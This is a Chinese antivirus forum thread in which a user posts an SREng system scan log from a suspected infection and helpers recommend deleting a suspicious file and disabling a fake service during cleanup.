& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\nfio.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\fsdrvplg.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\FSSync.dll]&&[Kaspersky Lab, 7.0.5.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\basegui.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\thpimpl.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [c:\program files\kaspersky lab\kaspersky anti-virus 7.0\winreg.ppl]&&[Kaspersky Lab, 7.0.1.325]
& & [C:\WINDOWS\system32\msacm32.drv]&&[Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 2148 / cyscys][D:\Program Files\sreng2\SREngLdr.EXE]&&[Smallfrogs Studio, 2.6.12.1018]
[PID: 2280 / cyscys][D:\Program Files\sreng2\SRE5408720f.EXE]&&[Smallfrogs Studio, 2.6.12.1018]
& & [D:\Program Files\sreng2\Upload\3rdUpd.DLL]&&[Smallfrogs Studio, 2, 1, 0, 15]
==================================
文件关联
.TXT&&Error. [C:\WINDOWS\notepad.exe %1]
.EXE&&OK. [&%1& %*]
.COM&&OK. [&%1& %*]
.PIF&&OK. [&%1& %*]
.REG&&OK. [regedit.exe &%1&]
.BAT&&OK. [&%1& %*]
.SCR&&OK. [&%1& /S]
.CHM&&Error. [&hh.exe& %1]
.HLP&&OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI&&Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF&&OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS&&Error. [%SystemRoot%\System32\CScript.exe &%1& %*]
.JS& &Error. [%SystemRoot%\System32\CScript.exe &%1& %*]
.LNK&&OK. [{0-}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1& && & localhost
==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 520, C:\PROGRAM FILES\CFOSSPEED\CFOSSPEED.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 604, D:\PROGRAM FILES\ALFACLOCK\ALFACLOCK.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 632, C:\PROGRAM FILES\WINTOOLS\RAM SAVER PRO\RAMSAVERPRO.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 728, C:\PROGRAM FILES\CFOSSPEED\SPD.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2172, D:\PROGRAM FILES\BITSPIRIT\BITSPIRIT.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3904, D:\PROGRAM FILES\MAXTHON\MAXTHON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2148, D:\PROGRAM FILES\SRENG2\SRENGLDR.EXE]
==================================
API HOOK
N/A
==================================
隐藏进程
N/A
==================================
[ 本帖最后由 秋叶濛濛 于
09:52 编辑 ]
1.建议使用XDelBox删除以下文件:()
使用说明:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从“剪贴板导入不检查路径”,导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质(包括U盘,MP3,手机存储卡等)。
C:\Program Files\Internet
2.删除重启后使用SREng修复下面各项:
启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Clip Book server / Clip Book server][Stopped/Auto Start]
&&&C:\Program Files\Internet &&(File is missing)&
--------------------------------------------------------------
C:\WINDOWS\explorer.exe
C:\WINDOWS\Explorer.EXE
这两个上传到进行检测
没有问题,是XDELBOX留下的痕迹
EXPLORER.EXE 1/36 只有瑞星报病毒
C:\Program Files\Internet
是xdelbox的遗留
别的看不出什么来
下载windows清理助手清理一遍
主要就是除了顶楼描述的,其他一点中毒的迹象就没有,而且开机运行很好,过一段时间才突然出现个EXE文件报毒。郁闷啊
继续求助啊~~~ 达人快来
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,

我要回帖

更多关于 7136 9178 6104 的文章

 

随机推荐